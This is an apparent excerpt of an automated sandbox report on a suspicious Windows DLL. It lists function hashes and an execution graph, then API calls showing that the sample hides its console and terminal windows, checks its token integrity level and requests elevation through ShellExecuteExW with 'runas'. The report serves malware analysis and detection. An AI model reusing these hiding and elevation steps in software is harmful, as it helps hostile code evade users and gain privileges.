                                          • Instruction ID: a557b8362ab2bb438142197aed2ed97f6b688b76df636fd9e9b64aec2c214e16
                                          • Opcode Fuzzy Hash: 02c450e3e860491ffcb4e3c2ccbe7ee5cec25dc8199363730b59f6652e84236b
                                          • Instruction Fuzzy Hash: C9F02732A1A4158FDB05FB3CD86E8E43B70FF4821874901E7C009CB0A3F90AA697CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8BFC1B Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b8b30b42306025892bd8a7155a8bffe5a87102e49a880305b85acfb35ba0aff
                                          • Instruction ID: 8ede2238235a641a8254d3bf9c9e4ff02ebc508c17143f5a26908cfcbd3a0398
                                          • Opcode Fuzzy Hash: 8b8b30b42306025892bd8a7155a8bffe5a87102e49a880305b85acfb35ba0aff
                                          • Instruction Fuzzy Hash: 62E0C07250EA1C0FDB14AA596C15CE2BF98EE89374F00015FF40CC2122E1115552C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A1F5E Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dab2f17aa48965f63cc4a8a0d92379ce09c9163b5e1dc0c910f3e9ebf6b00cad
                                          • Instruction ID: 15248ecce65dc6d28ad3f81dd491785d4963c1966fd6d15e599e74b45d02221e
                                          • Opcode Fuzzy Hash: dab2f17aa48965f63cc4a8a0d92379ce09c9163b5e1dc0c910f3e9ebf6b00cad
                                          • Instruction Fuzzy Hash: CDE09220F1D5090BD758BB6C68272BDA3D3DB8C324F0402FEE15EC32AACD1C58424282
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8C66B8 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd2fc4c56a9a9e471ee1b1f4805a869d90dde4ea550074a35c5668f274c71628
                                          • Instruction ID: cb24a1895d86e50dc83645c4f3cb361c60bd5a50562da37ac2749778e7cf667d
                                          • Opcode Fuzzy Hash: fd2fc4c56a9a9e471ee1b1f4805a869d90dde4ea550074a35c5668f274c71628
                                          • Instruction Fuzzy Hash: 4CF01270914A4D8FDB94EF68C45076533E1FF58318F910569E42DC71A1CB35E995C700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AA8E1 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d40a63eb86c17da1663ad2f9d60b97fdcf6ee3f7170ecd8161b0e55208d80ae9
                                          • Instruction ID: 30a966e84db7cfd0d7a4ea75b2b6e16bc7b94cb91e759b8ac14ec8589c67d839
                                          • Opcode Fuzzy Hash: d40a63eb86c17da1663ad2f9d60b97fdcf6ee3f7170ecd8161b0e55208d80ae9
                                          • Instruction Fuzzy Hash: 2DE0207194EA4C5BCF94AB599C511D53BA0FF4C304F06016AE15CC3191D7355A94C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8ABA20 Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                          • Instruction ID: 7b98cb7ae2748eae44a583b39ee3d704249fdcbc5f8ece6c11fbef22e2e38cfd
                                          • Opcode Fuzzy Hash: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                          • Instruction Fuzzy Hash: B0E0BF71914A0C9F8B48EF58E8498DA7BF4FB69315B01025BF41DD3160DB719A54CBC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8BD4C0 Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1f28e0735306b5959125236ec85025f6336ac23595cbf9ec9d9aff5f90f9a2c
                                          • Instruction ID: 037b38b6ecdc9e0ec6c8e41c2afdd8746b9371c0e7a8a4f47c6e9e76503375de
                                          • Opcode Fuzzy Hash: b1f28e0735306b5959125236ec85025f6336ac23595cbf9ec9d9aff5f90f9a2c
                                          • Instruction Fuzzy Hash: 72E0EC20B1982D4FEAA8A7BC60656B863D0EF5D20074600F5E40DD72B6DD496E824BC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A4B10 Relevance: .0, Instructions: 24COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9651c49ffbb672c89afb72d525d015d77e2370a2cfc9c6c74575a134d03b1e39
                                          • Instruction ID: 9843a80c642a52b6795252937143b12aef5d2224b59c379ff52cd65c445e2572
                                          • Opcode Fuzzy Hash: 9651c49ffbb672c89afb72d525d015d77e2370a2cfc9c6c74575a134d03b1e39
                                          • Instruction Fuzzy Hash: B9D01251B2992A57E77867AC28622F42281EB5C654B4580B5A41DC119DEC582D9152D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AE99D Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e96c5f1fd035ab442c14ac27235029393af5a7def126e4ee8c9eeb4405af498b
                                          • Instruction ID: c716cbe9256f4115ace0a14cb078a0631aae0ba0665a909140d74a24050168d0
                                          • Opcode Fuzzy Hash: e96c5f1fd035ab442c14ac27235029393af5a7def126e4ee8c9eeb4405af498b
                                          • Instruction Fuzzy Hash: 67D02B21F0081D0DEB44B3F43C365FCF285DFC8101B910831D11DC30C7CC1915110281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A5149 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f70a3e4258ff54568b24287414ad9cf349bcb73e6a25d9bc101839ce3ce44c9f
                                          • Instruction ID: 1628d21ed9fa88dfad160e2ec1974f624ead60516f9dd73951122ee4a2dc0d76
                                          • Opcode Fuzzy Hash: f70a3e4258ff54568b24287414ad9cf349bcb73e6a25d9bc101839ce3ce44c9f
                                          • Instruction Fuzzy Hash: 83E0C202A2F94F4EEA2133BD0C71174A9809F1D680F4B00B4D80CCB0F3FC589A884261
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8BAE60 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 941add5e61551e6c44e7397dff348394a1da12bc9f5db8b1286dd5523c152982
                                          • Instruction ID: 8695601abc4ecd7136d1eae1059ccfdcf127e5edb158b80db08973b47061f3b6
                                          • Opcode Fuzzy Hash: 941add5e61551e6c44e7397dff348394a1da12bc9f5db8b1286dd5523c152982
                                          • Instruction Fuzzy Hash: A9C0121271D92C09E174625C78162F5B3C1C795231F1002BBD48AC1656DC5B598702C5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B5EA5 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5d97f5a3fddd7cf89062600496adaf892c2bf9b695d5b6afa0f3c3b9a6364f7
                                          • Instruction ID: b6e6a11d8a42ae76fd1e0adb3aaf1768aff2dc7ef0d94bd233f4af6de2d12d5f
                                          • Opcode Fuzzy Hash: d5d97f5a3fddd7cf89062600496adaf892c2bf9b695d5b6afa0f3c3b9a6364f7
                                          • Instruction Fuzzy Hash: 18C04C73B4E12948F7286198B8230FDF350EB8A175B51113BD34A818526917353749C6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A81C0 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c5e06549e8dc0933093c7787333472fa08df5c0d07dc7d1c611b4a59737688a
                                          • Instruction ID: 276be217aed0b6ec11d51fe96ba772bdd3456e4f17fa262a007e095375f8940a
                                          • Opcode Fuzzy Hash: 3c5e06549e8dc0933093c7787333472fa08df5c0d07dc7d1c611b4a59737688a
                                          • Instruction Fuzzy Hash: 6AC0123255DA4D47C301A794E8618EAF390FF90310F510A3AE04A920A9EDD8A64486C2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AFBF9 Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a403bf08bf6f31eb1c96011066581c925a786bf58cb9b9b7e64f5ee52dd5b0a
                                          • Instruction ID: 53c315e6f998edb12c00d0669bee29fdca43cb7f1199fa8bc42e830192c745c5
                                          • Opcode Fuzzy Hash: 3a403bf08bf6f31eb1c96011066581c925a786bf58cb9b9b7e64f5ee52dd5b0a
                                          • Instruction Fuzzy Hash: 7EC012715146444FE714AA44C44A4E933D1FB98245FC40A6AEC88CA261DA28964646A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B8524 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 174ccbe69c25f228ee205da7db928a5abeb888826226028c28102d0395c250fe
                                          • Instruction ID: 18e66654e16a49efeba5ac8f86cda2f4c9715ab4ba20998bbd295b82aaceb101
                                          • Opcode Fuzzy Hash: 174ccbe69c25f228ee205da7db928a5abeb888826226028c28102d0395c250fe
                                          • Instruction Fuzzy Hash: ECB01233B4E03C49AF3052C8BC428FCF350E789175B122133C20EA10006517A13207C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B3A86 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0c7d2d19b92b04b4b7fd64bcfb5a202519d5645673a44fec078a6ae60055a11
                                          • Instruction ID: 670bdcd8725b969e3ffc543a3b6bb98ce78fd9e21ca2860fef04944e10dedd26
                                          • Opcode Fuzzy Hash: b0c7d2d19b92b04b4b7fd64bcfb5a202519d5645673a44fec078a6ae60055a11
                                          • Instruction Fuzzy Hash: 89A01206F4901100B24434587C410E4E3018BC0075A544932D4144008DD89E11821141
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AD9DC Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                          • Instruction ID: 54973b48f549b222dd40ee8fa8bb78e95c6eedcb191323410dabf62405a7690c
                                          • Opcode Fuzzy Hash: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                          • Instruction Fuzzy Hash: BDB01235F4644D56DF2067F428264FD3288EF4C204F860572F80DC3193DD29B7340A50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AC227 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1efa8010a0fc830859ee395f70069e0076dd23dbedb15054713cefcec95c2340
                                          • Instruction ID: 546f11e48ef859a97d13f0512e2c02f14c67ecdd2d7a5e03a134fdcac651f362
                                          • Opcode Fuzzy Hash: 1efa8010a0fc830859ee395f70069e0076dd23dbedb15054713cefcec95c2340
                                          • Instruction Fuzzy Hash: 6CA01233B4101D848B2081C4B8100FDB314E788121B110033E21DC1000551515280590
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00007FFD9B8A04F2 Relevance: 7.8, Strings: 6, Instructions: 302COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ?M_^$M_^N$M_^P$M_^f$M_^t$M_^v
                                          • API String ID: 0-3152059592
                                          • Opcode ID: 819fb4a2cea7a7d89696681863c58e1f492d18b5736982d520ff105fef2b20f6
                                          • Instruction ID: d59034d5ad3c46dd37a4ffd2616f10f0eb070fb912a0a3dd54e6dc3e0ea6d1a0
                                          • Opcode Fuzzy Hash: 819fb4a2cea7a7d89696681863c58e1f492d18b5736982d520ff105fef2b20f6
                                          • Instruction Fuzzy Hash: EC81C143B0E17A85E31A37BC79694F96B40CF8273DB0847F7D0ED8A0C7AC49208762A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:0.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:12.9%
                                          Total number of Nodes:124
                                          Total number of Limit Nodes:9
                                          execution_graph 35631 6d16798c 35632 6d167997 35631->35632 35633 6d1679ca 35631->35633 35635 6d1679bc 35632->35635 35636 6d16799c 35632->35636 35659 6d167ae6 167 API calls 4 library calls 35633->35659 35643 6d1679df 35635->35643 35638 6d1679b2 35636->35638 35639 6d1679a1 35636->35639 35658 6d167721 23 API calls 35638->35658 35641 6d1679a6 35639->35641 35657 6d167740 21 API calls 35639->35657 35644 6d1679eb __FrameHandler3::FrameUnwindToState 35643->35644 35660 6d1677b1 35644->35660 35646 6d1679f2 __DllMainCRTStartup@12 35647 6d167ade 35646->35647 35648 6d167a19 35646->35648 35654 6d167a55 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 35646->35654 35674 6d16855e 4 API calls 2 library calls 35647->35674 35671 6d167713 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 35648->35671 35651 6d167ae5 35652 6d167a28 __RTC_Initialize 35652->35654 35672 6d167655 InitializeSListHead 35652->35672 35654->35641 35655 6d167a36 35655->35654 35673 6d1676e8 IsProcessorFeaturePresent ___scrt_release_startup_lock 35655->35673 35657->35641 35658->35641 35659->35641 35661 6d1677ba 35660->35661 35675 6d167ef8 IsProcessorFeaturePresent 35661->35675 35663 6d1677c6 35676 6d16b3ec 10 API calls 2 library calls 35663->35676 35665 6d1677cb 35670 6d1677cf 35665->35670 35677 6d179b98 35665->35677 35667 6d1677e6 35667->35646 35670->35646 35671->35652 35672->35655 35673->35654 35674->35651 35675->35663 35676->35665 35681 6d184969 35677->35681 35680 6d16b421 7 API calls 2 library calls 35680->35670 35682 6d1677d8 35681->35682 35683 6d184979 35681->35683 35682->35667 35682->35680 35683->35682 35685 6d17b521 35683->35685 35686 6d17b528 35685->35686 35687 6d17b56b GetStdHandle 35686->35687 35688 6d17b5d1 35686->35688 35689 6d17b57e GetFileType 35686->35689 35687->35686 35688->35683 35689->35686 35690 6d167ccc 35691 6d167cd5 35690->35691 35692 6d167cda 35690->35692 35711 6d168722 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 35691->35711 35696 6d167b96 35692->35696 35697 6d167ba2 __FrameHandler3::FrameUnwindToState 35696->35697 35698 6d167bcb dllmain_raw 35697->35698 35699 6d167bc6 35697->35699 35708 6d167bb1 35697->35708 35700 6d167be5 dllmain_crt_dispatch 35698->35700 35698->35708 35712 6d144dd0 35699->35712 35700->35699 35700->35708 35703 6d167c37 35704 6d167c40 dllmain_crt_dispatch 35703->35704 35703->35708 35706 6d167c53 dllmain_raw 35704->35706 35704->35708 35705 6d144dd0 __DllMainCRTStartup@12 147 API calls 35707 6d167c1e 35705->35707 35706->35708 35715 6d167ae6 167 API calls 4 library calls 35707->35715 35710 6d167c2c dllmain_raw 35710->35703 35711->35692 35713 6d144dee 35712->35713 35714 6d144dd9 CreateThread 35712->35714 35713->35703 35713->35705 35714->35713 35716 6d144bd0 EnumWindows GetConsoleWindow ShowWindow GetCurrentProcess OpenProcessToken 35714->35716 35715->35710 35717 6d144c31 GetTokenInformation 35716->35717 35718 6d144c53 35716->35718 35791 6d144b70 GetClassNameW lstrcmpW 35716->35791 35717->35718 35719 6d144c61 35718->35719 35720 6d144c5a FindCloseChangeNotification 35718->35720 35721 6d144c65 35719->35721 35722 6d144c6f 35719->35722 35720->35719 35775 6d144590 130 API calls 3 library calls 35721->35775 35737 6d148ac0 35722->35737 35724 6d144c6a 35734 6d144d2e error_info_injector 35724->35734 35729 6d144d50 35730 6d144cb6 35757 6d144a50 ShellExecuteExW 35730->35757 35732 6d144d56 35777 6d1731ca 35732->35777 35733 6d144cbb error_info_injector 35733->35732 35733->35734 35776 6d1675e6 5 API calls ___raise_securityfailure 35734->35776 35738 6d148b10 35737->35738 35741 6d148b1d 35737->35741 35782 6d149790 26 API calls 4 library calls 35738->35782 35740 6d144ca4 35743 6d1468d0 35740->35743 35741->35740 35783 6d1498d0 26 API calls 4 library calls 35741->35783 35745 6d1468fb 35743->35745 35744 6d146902 35744->35730 35745->35744 35746 6d146999 35745->35746 35748 6d14695d 35745->35748 35749 6d14693e 35745->35749 35786 6d141450 26 API calls 2 library calls 35746->35786 35756 6d146952 _Yarn 35748->35756 35785 6d141450 26 API calls 4 library calls 35748->35785 35749->35746 35751 6d146945 35749->35751 35750 6d14694b 35752 6d1731ca 25 API calls 35750->35752 35750->35756 35784 6d141450 26 API calls 4 library calls 35751->35784 35755 6d1469a3 35752->35755 35756->35730 35758 6d144ae5 WaitForSingleObject CloseHandle 35757->35758 35759 6d144afb 35757->35759 35767 6d144b0e 35758->35767 35760 6d1468d0 26 API calls 35759->35760 35761 6d144b09 35760->35761 35764 6d144a50 26 API calls 35761->35764 35762 6d144b3d error_info_injector 35787 6d1675e6 5 API calls ___raise_securityfailure 35762->35787 35764->35767 35765 6d144b60 35768 6d1731ca 25 API calls 35765->35768 35766 6d144b5c 35766->35733 35767->35762 35767->35765 35769 6d144b65 GetClassNameW lstrcmpW 35768->35769 35771 6d144bb5 35769->35771 35772 6d144bad ShowWindow 35769->35772 35788 6d1675e6 5 API calls ___raise_securityfailure 35771->35788 35772->35771 35774 6d144bc5 35774->35733 35775->35724 35776->35729 35789 6d173156 25 API calls 3 library calls 35777->35789 35779 6d1731d9 35790 6d1731e7 11 API calls std::locale::_Setgloballocale 35779->35790 35781 6d1731e6 35782->35741 35783->35741 35784->35750 35785->35756 35786->35750 35787->35766 35788->35774 35789->35779 35790->35781 35792 6d144bb5 35791->35792 35793 6d144bad ShowWindow 35791->35793 35796 6d1675e6 5 API calls ___raise_securityfailure 35792->35796 35793->35792 35795 6d144bc5 35796->35795

                                          Executed Functions

                                          Function 6D144A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 117stringsynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • ShellExecuteExW.SHELL32 ref: 6D144ADB
                                          • WaitForSingleObject.KERNEL32(6D18C8CD,000000FF), ref: 6D144AEA
                                          • CloseHandle.KERNEL32(6D18C8CD), ref: 6D144AF3
                                          • GetClassNameW.USER32(?,?,00000064), ref: 6D144B91
                                          • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6D144BA3
                                          • ShowWindow.USER32(?,00000000), ref: 6D144BAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ClassCloseExecuteHandleNameObjectShellShowSingleWaitWindowlstrcmp
                                          • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                          • API String ID: 1631206612-3791737310
                                          • Opcode ID: cf9003509f88ccb3785606bedfe4f23c96ddf949b1150244c42c2659c0279b48
                                          • Instruction ID: 34c4fdbad00674cbe3b1e2726601eb1df64eb0cac79112bcb24e3fba431886c6
                                          • Opcode Fuzzy Hash: cf9003509f88ccb3785606bedfe4f23c96ddf949b1150244c42c2659c0279b48
                                          • Instruction Fuzzy Hash: 7D41A371D0420C9BDF00DFA4D944BADBBB9FB09315F108259E911A7284EBB49A45CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D167AE6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • __RTC_Initialize.LIBCMT ref: 6D167B2D
                                          • ___scrt_uninitialize_crt.LIBCMT ref: 6D167B47
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Initialize___scrt_uninitialize_crt
                                          • String ID:
                                          • API String ID: 2442719207-0
                                          • Opcode ID: 1f80884aae354c1d76376c4fe73b30ba45fa2d54b0915581ed666cc74c00549e
                                          • Instruction ID: 1b122b86223c2ccd034db2ee29d53c87dfa9e08f798380abbd6f8d0245c7b23d
                                          • Opcode Fuzzy Hash: 1f80884aae354c1d76376c4fe73b30ba45fa2d54b0915581ed666cc74c00549e
                                          • Instruction Fuzzy Hash: FE41E532D0829AEFDB118F68D840B7E7AB4EB91B65F02411BE91057648C7F44D21DBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D144BD0 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • EnumWindows.USER32(6D144B70,00000000), ref: 6D144C00
                                          • GetConsoleWindow.KERNELBASE(00000000), ref: 6D144C08
                                          • ShowWindow.USER32(00000000), ref: 6D144C0F
                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 6D144C20
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 6D144C27
                                          • GetTokenInformation.KERNELBASE(00000004,00000014(TokenIntegrityLevel),?,00000004,?), ref: 6D144C47
